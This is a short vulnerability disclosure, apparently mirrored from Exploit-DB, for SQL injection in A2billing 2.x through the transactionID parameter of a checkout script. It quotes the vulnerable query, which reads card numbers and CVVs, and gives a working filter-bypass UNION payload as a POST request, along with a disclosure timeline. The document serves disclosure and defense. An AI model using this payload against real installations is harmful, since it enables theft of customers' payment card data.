A2billing 2.x – SQL Injection

  • 作者: 0x4148
    日期: 2017-09-05
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/42615/
  • # Title : A2billing 2.x , Sql injection vulnerability
    # Vulnerable software : A2billing 2.x
    # Author : Ahmed sultan (0x4148)
    # Email : 0x4148@gmail.com
    # Linkedin : https://www.linkedin.com/in/0x4148/
    If you're looking for deep technical stuff , overcoming sanitization/hardening . . etc you can check out the full writeup at https://0x4148.com/2016/10/28/a2billing-all-versions-2-1-1-sql-injection-exploit/
    A2billing is vulnerable to sql injection attack resulting from not enough sanitization of several inputs including transactionID
    The sanitization proccess differ from version to another , but the concept is the same ,
    I demonstrated bypassing the last version (2.1.1) , but still all versions till the moment are vulnerable as well with just little bit different modifications
    File : agent/public/checkout_process.php
    getpost_ifset(array('transactionID', 'sess_id', 'key', 'mc_currency',
    'currency', 'md5sig', 'merchant_id', 'mb_amount', 'status', 'mb_currency',
    'transaction_id', 'mc_fee', 'card_number'));
    // Status - New 0 ; Proceed 1 ; In Process 2
    $QUERY = "SELECT id, agent_id, amount, vat, paymentmethod, cc_owner,
    cc_number, cc_expires, creationdate, status, cvv, credit_card_type,
    currency " .
    " FROM cc_epayment_log_agent " .
    " WHERE id = ".$transactionID." AND (status = 0 OR (status = 2 AND
    $transaction_data = $paymentTable->SQLExec ($DBHandle_max, $QUERY);
    POC :
    Sending POST request : transactionID=456789111111 unise//**lectonselinse//**rtect 1,2,3,4,0x706c75676e706179,6,7,8,9,10,11,12,13-//**--&sess_id=4148key=636902c6ed0db5780eb613d126e95268
    to : https://HOST/a2billing/agent/Public/checkout_process.php
    will result in redirection of the application and the Location header will contain our decoded payment module which was used in the query "plugnpay" , which indicate successful injection
    Full exploitation demo : https://www.youtube.com/watch?v=8dfdZCmPGWA
    Exploit timeline :
    01/10/2016 : vulnerability reported to vendor
    06/10/2016 - 12/2016 : talks talks talks with promises of fixing ASAP
    04/09/2017 : Public release
    Full exploit code is attached <loose code for demonstration purposes only>
    Thanks fly to R1z clan :)